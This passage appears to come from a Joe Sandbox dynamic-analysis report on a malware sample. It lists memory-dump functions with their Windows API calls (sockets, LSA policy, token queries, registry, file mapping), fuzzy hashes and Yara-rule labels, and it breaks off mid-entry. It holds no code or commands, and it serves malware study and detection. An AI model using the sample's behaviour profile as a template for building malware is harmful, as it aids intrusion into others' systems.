                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 649 5d0875-5d08f1 653 5d08f6-5d08ff 649->653 654 5d08f3 649->654 655 5d0904-5d090d 653->655 656 5d0901 653->656 654->653 657 5d090f-5d0933 CreateMutexW 655->657 658 5d095e-5d0963 655->658 656->655 661 5d0965-5d096a 657->661 662 5d0935-5d095b 657->662 658->657 661->662
                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 005D0915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: 9d369a7efa59688adaca7985ed914ec689727b5fea244ca9401537faf0eed8fb
                                                                                  • Instruction ID: 90284cb4170727f7d107beea8b5d29e9f0e3152cad2a18094269fd2e15e9618d
                                                                                  • Opcode Fuzzy Hash: 9d369a7efa59688adaca7985ed914ec689727b5fea244ca9401537faf0eed8fb
                                                                                  • Instruction Fuzzy Hash: 133150B1505384AFE721CF25CC45B96FFE8EF05310F0884ABE9888B292D375E948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D12DD, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 665 5d12dd-5d13bb CreateFileMappingW
                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 005D138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  • Opcode ID: 779fa284b3941ed926c2515c8f6232aa52dd5f5e42d6640110f6887ff0dfcce0
                                                                                  • Instruction ID: 722403ccf0e00aab37bba5fb134965c405c5d5d18590cc4beeac4fcb085767df
                                                                                  • Opcode Fuzzy Hash: 779fa284b3941ed926c2515c8f6232aa52dd5f5e42d6640110f6887ff0dfcce0
                                                                                  • Instruction Fuzzy Hash: E73180715093C09FD312CB219C55B62BFB4EF47610F0A81DBE8848B693D225A919C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A120, Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 627 27a120-27a147 628 27a19d-27a1bd WSAStartup 627->628 629 27a149-27a19b 627->629 631 27a1c4-27a1f3 628->631 629->628
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(?,00000E40,?,?), ref: 0027A1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup
                                                                                  • String ID:
                                                                                  • API String ID: 724789610-0
                                                                                  • Opcode ID: 2604c4d0bf6c46508b81748b02f6afd0b34ff571ecfeff66d1c2032cb7276ea6
                                                                                  • Instruction ID: 40a1634a6b45c2d16717fe115b318bdf8efa6de1c46bad98c2a17eb99e6f87b0
                                                                                  • Opcode Fuzzy Hash: 2604c4d0bf6c46508b81748b02f6afd0b34ff571ecfeff66d1c2032cb7276ea6
                                                                                  • Instruction Fuzzy Hash: 0731827140D3C19FD3138B358C55BA6BFB4EF47620F1985DBD8888F293D229A919C7A2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B2F3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 634 27b2f3-27b379 638 27b37e-27b387 634->638 639 27b37b 634->639 640 27b3d6-27b3db 638->640 641 27b389-27b391 LsaOpenPolicy 638->641 639->638 640->641 643 27b397-27b3a9 641->643 644 27b3dd-27b3e2 643->644 645 27b3ab-27b3d3 643->645 644->645
                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0027B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  • Opcode ID: be8e7a47434ede1c9eba1216d0527eee4be2afdedee4de2bf382f82a4a063581
                                                                                  • Instruction ID: 1a9c3689690cd9fe6908a280ff531ebcd2a9f4fdc55dfc681d4c6cf68f2b03b0
                                                                                  • Opcode Fuzzy Hash: be8e7a47434ede1c9eba1216d0527eee4be2afdedee4de2bf382f82a4a063581
                                                                                  • Instruction Fuzzy Hash: 58219E72504384AFEB21CF65DC85FA6BFA8EF05310F08859AF988DB152D375A948CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D04F8, Relevance: 1.6, APIs: 1, Instructions: 80fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: d47489fa7f6c4113ffc1c2e88295078dc4c09395feb01e97eb7e6d1d0cd38f49
                                                                                  • Instruction ID: 0a1df254c89ecf0143bb5196a1d534f63ad01ef78e12161a5930924aa6b76dce
                                                                                  • Opcode Fuzzy Hash: d47489fa7f6c4113ffc1c2e88295078dc4c09395feb01e97eb7e6d1d0cd38f49
                                                                                  • Instruction Fuzzy Hash: 89218C72405384AFE722CB55DC45F96FFE8EF06220F04859BE9889B292D375A909CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D1137, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAEventSelect.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D11C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: EventSelect
                                                                                  • String ID:
                                                                                  • API String ID: 31538577-0
                                                                                  • Opcode ID: 16f4dab6933eaf184f21c3ae101574521a8da33f504ef2311d719c2a09c38f7e
                                                                                  • Instruction ID: 25e3d5e948048cb714892f769cce29d5dd1b569ead1d114081965b319c75dcf3
                                                                                  • Opcode Fuzzy Hash: 16f4dab6933eaf184f21c3ae101574521a8da33f504ef2311d719c2a09c38f7e
                                                                                  • Instruction Fuzzy Hash: 36219272409384AFE722CB61CC45F96BFB8EF06310F09859BE989DB192D225A948C775
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0406, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 005D0491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 2004f1ffacc7e885737f51dc128fe57719652f5669d649afc9503c751550bea7
                                                                                  • Instruction ID: 9c858f6ec6e6148f4de379c1a744a05b2cce8ff9fbdd1c4dbe61c977351fa39e
                                                                                  • Opcode Fuzzy Hash: 2004f1ffacc7e885737f51dc128fe57719652f5669d649afc9503c751550bea7
                                                                                  • Instruction Fuzzy Hash: 5A2183B1505380AFE721CB55DC45FA6FFE8EF05310F0884ABE9849B292D375A904CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027BD00, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BD95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: 5e2fce20f23f947e23770353f8ce1ded2c96da61a0ac921474a73d27f1f1a3e1
                                                                                  • Instruction ID: 895e877b188fc42370dbddd599539e9ef90e409935b6ccb6a1f74e041fc621c2
                                                                                  • Opcode Fuzzy Hash: 5e2fce20f23f947e23770353f8ce1ded2c96da61a0ac921474a73d27f1f1a3e1
                                                                                  • Instruction Fuzzy Hash: 4E212CB6409780AFE713CB159C41BA3BFA8EF46320F0981DBF9848B193D224A905C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B82E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0027B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: f9508c72194587fb03de07c4cbd6ba7162a578100795762779a255c5a837a1f6
                                                                                  • Instruction ID: 76dd9cae13db44ed5b46d19cef4c15364ea8efc037009e9408406c60143b1d4c
                                                                                  • Opcode Fuzzy Hash: f9508c72194587fb03de07c4cbd6ba7162a578100795762779a255c5a837a1f6
                                                                                  • Instruction Fuzzy Hash: EB217E71509384AFE722CF51DC45F96FFA8EF05210F04849EEA898B292D375A918CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D20A0, Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 005D2131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: cb11c0791935c65bb7b4eea581eb2be4eb50bed2ec2c1a723f5abdb1fceecba6
                                                                                  • Instruction ID: 8ce8467a2ef62ecf796746cbb03e01494f825a269c199f8a6e857dc40de0ce52
                                                                                  • Opcode Fuzzy Hash: cb11c0791935c65bb7b4eea581eb2be4eb50bed2ec2c1a723f5abdb1fceecba6
                                                                                  • Instruction Fuzzy Hash: 382190715093C09FE722CB65DC55B92BFF4EF17260F0984DBE984CB263D225A808CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027BC2A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0027BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 07e042ddbee56454025f08971c45e8880d556094339ac6ef2ad2437ea1116fe8
                                                                                  • Instruction ID: 905d80c634c149a8b24f0d85db5ea662ba022bc844f067eee329f80876636ce4
                                                                                  • Opcode Fuzzy Hash: 07e042ddbee56454025f08971c45e8880d556094339ac6ef2ad2437ea1116fe8
                                                                                  • Instruction Fuzzy Hash: 8B217C71500700EFEB22DF65CC85B66FBE8EF08710F14846EE9898B252D771E914CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D016A, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D01FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: e499e34d51a0c659b41e4dc26a24fdf674cce586f0679c382d1bc7b38fb9a39c
                                                                                  • Instruction ID: 3a6c74a49e69b7cd6a5b00383dce52316b22f510b6f32c1f107b57f7c4a41605
                                                                                  • Opcode Fuzzy Hash: e499e34d51a0c659b41e4dc26a24fdf674cce586f0679c382d1bc7b38fb9a39c
                                                                                  • Instruction Fuzzy Hash: 3E219A72505740AFE722CF55DC44FA2BFF8EF05320F08859BE9899B292C264E909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0E79, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: b9ef1fbb125e0beafdfe5462a19bccc75669524301412fbd707d14b3093ba17b
                                                                                  • Instruction ID: d84a1f0b9a0338b2477faefcdf902203398c8f9e2b36f8856b138424c3f4b2e9
                                                                                  • Opcode Fuzzy Hash: b9ef1fbb125e0beafdfe5462a19bccc75669524301412fbd707d14b3093ba17b
                                                                                  • Instruction Fuzzy Hash: 2421C272509380AFE721CF15CC44F96BFA8EF45320F0884ABF948DB292C234A908CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0027ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 2a05ca6c90659c7e8c385dffce74867747833854fed1849c9e2a3d4c712f6d68
                                                                                  • Instruction ID: 668d9b16edcb7f02360bf5df71b6f0049b9a0a0e69e96d1506d5d9bcd6519f22
                                                                                  • Opcode Fuzzy Hash: 2a05ca6c90659c7e8c385dffce74867747833854fed1849c9e2a3d4c712f6d68
                                                                                  • Instruction Fuzzy Hash: 14219D72500304EFFB21DE11DC85FAAFBACEF44760F04855AF9499A241D674E9088AB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027BEB2, Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 27ae30d80374333362e92490332815aae8a3e6d6a7c5fdd0ec4699e4b1f39872
                                                                                  • Instruction ID: 4a20bbd4ccad983c89954c7154b59da194227130fb98605f116feae6e39a9fad
                                                                                  • Opcode Fuzzy Hash: 27ae30d80374333362e92490332815aae8a3e6d6a7c5fdd0ec4699e4b1f39872
                                                                                  • Instruction Fuzzy Hash: 4A21C0B2404340EFEB22CF51DC44FA7BFA8EF45720F0485AAF9499B552C275A918CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D08A2, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 005D0915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: c2220f1fe504652a80318a81e04e3d3be686eb6ef1942b1f32f7e037fb5f7b1d
                                                                                  • Instruction ID: b231bf83ebe4ea3337236302bfa01557b0ea9afd86e428f6ecc3194a2bfac850
                                                                                  • Opcode Fuzzy Hash: c2220f1fe504652a80318a81e04e3d3be686eb6ef1942b1f32f7e037fb5f7b1d
                                                                                  • Instruction Fuzzy Hash: 43218E71500344AFF720DF29CC85BA6FBE8EF04720F04846BE9498B382D671E904CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B31E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0027B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  • Opcode ID: 159e0273822a2e2714fc9e041291de7e2c82b42a681f9041820ebc5dd34e0913
                                                                                  • Instruction ID: 1c929cf71d1e82c5fa8558c984378ed3192f399183dcdb3579f402df7337c53f
                                                                                  • Opcode Fuzzy Hash: 159e0273822a2e2714fc9e041291de7e2c82b42a681f9041820ebc5dd34e0913
                                                                                  • Instruction Fuzzy Hash: 1521D172500304EFFB21DF55DC85F6AFBA8EF04310F0485AAFD48CA241D770A9448A71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0F5D, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: 51820cfc0b2f6f944329d44862f3f5b0770d3810cc40504c4e20da9c95d37ac8
                                                                                  • Instruction ID: 8fa5d840dc351c82f4991400ce8288afe6fea290380fe87b95b4c30ffddb98ed
                                                                                  • Opcode Fuzzy Hash: 51820cfc0b2f6f944329d44862f3f5b0770d3810cc40504c4e20da9c95d37ac8
                                                                                  • Instruction Fuzzy Hash: 0A21C372409384AFEB22CF14CC45F96FFA8EF46310F08849BF9489B192C275A948C765
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D1460, Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 005D14D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: d75b0c9b1d225749dedc5da2b5d4f833886867e7c07f52c1b19e43a4100ee504
                                                                                  • Instruction ID: 4d27660d98723a7713b93110089a5133929df527d8ce52a9f1be65a0f675b80c
                                                                                  • Opcode Fuzzy Hash: d75b0c9b1d225749dedc5da2b5d4f833886867e7c07f52c1b19e43a4100ee504
                                                                                  • Instruction Fuzzy Hash: 5D219F7150A3C09FDB13CB25DC55A92BFB4EF07220F0984DBE8858F663C2659908DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B002, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 776ff77d4ab6f4701c5f1a9bb530e8fb42b613eaa10b58d8b64510eed2734113
                                                                                  • Instruction ID: 272b9f8ff1a44c00544cd08b48f50ebaa9a66b46bead7f4e693251817605cecf
                                                                                  • Opcode Fuzzy Hash: 776ff77d4ab6f4701c5f1a9bb530e8fb42b613eaa10b58d8b64510eed2734113
                                                                                  • Instruction Fuzzy Hash: 55119D72500304EFEB21CF61DC85FABBBA8EF04320F14856AF909CA241D670A9488BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B913, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0027B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 12a5b466bb96595dbb279276b93a17ff77005344d6c512270157316d02999df6
                                                                                  • Instruction ID: bd3c675fc5f479de682a3648e6a6047ffb1145d9b29facf6c8a69af6ae8360b8
                                                                                  • Opcode Fuzzy Hash: 12a5b466bb96595dbb279276b93a17ff77005344d6c512270157316d02999df6
                                                                                  • Instruction Fuzzy Hash: 74219A724093C09FDB22CF61DC45A92BFB4EF17220F0985DAE9888F163C2359959DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 77d437fa916467b109fa6bc69a8607dc11908eac73e590672b047ab4fd7b1caa
                                                                                  • Instruction ID: 39789f29b3db6949f52ef5f567a83efb477cddd2735c6f80413814fc60d2d185
                                                                                  • Opcode Fuzzy Hash: 77d437fa916467b109fa6bc69a8607dc11908eac73e590672b047ab4fd7b1caa
                                                                                  • Instruction Fuzzy Hash: C821A972210704EFEB21CF11CC81FAAB7ECEF44720F08C56AE9098B641D670E918CA72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D105E, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: 77b6309789d193bfb95d314b40f1fc724d8c798f18e8a3fc70e5ff00396aa3ad
                                                                                  • Instruction ID: 974d6ecdb0ad7cbfb23644ff5494f86f2a033a30498b7db9d5b89b18fb2a0811
                                                                                  • Opcode Fuzzy Hash: 77b6309789d193bfb95d314b40f1fc724d8c798f18e8a3fc70e5ff00396aa3ad
                                                                                  • Instruction Fuzzy Hash: 25216DB1501744EFF720DF55DC85BA6FBE8EF04320F14846BED488B342D675A944CA66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2C3F, Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 005D2CB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 181273e3d3b31ea56d32b9c27b48223087f5e68849353a4bf8f9270186a39926
                                                                                  • Instruction ID: 91aa700e2cf88f29a06dad8ce7643513326241e4ce532ffb734f8991474a992b
                                                                                  • Opcode Fuzzy Hash: 181273e3d3b31ea56d32b9c27b48223087f5e68849353a4bf8f9270186a39926
                                                                                  • Instruction Fuzzy Hash: C7219371509380AFE721CF29CC45B56FFA8EF16260F0885ABED45CB252D275EC04DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D0426, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 005D0491
                                                                                  Memory Dump Source
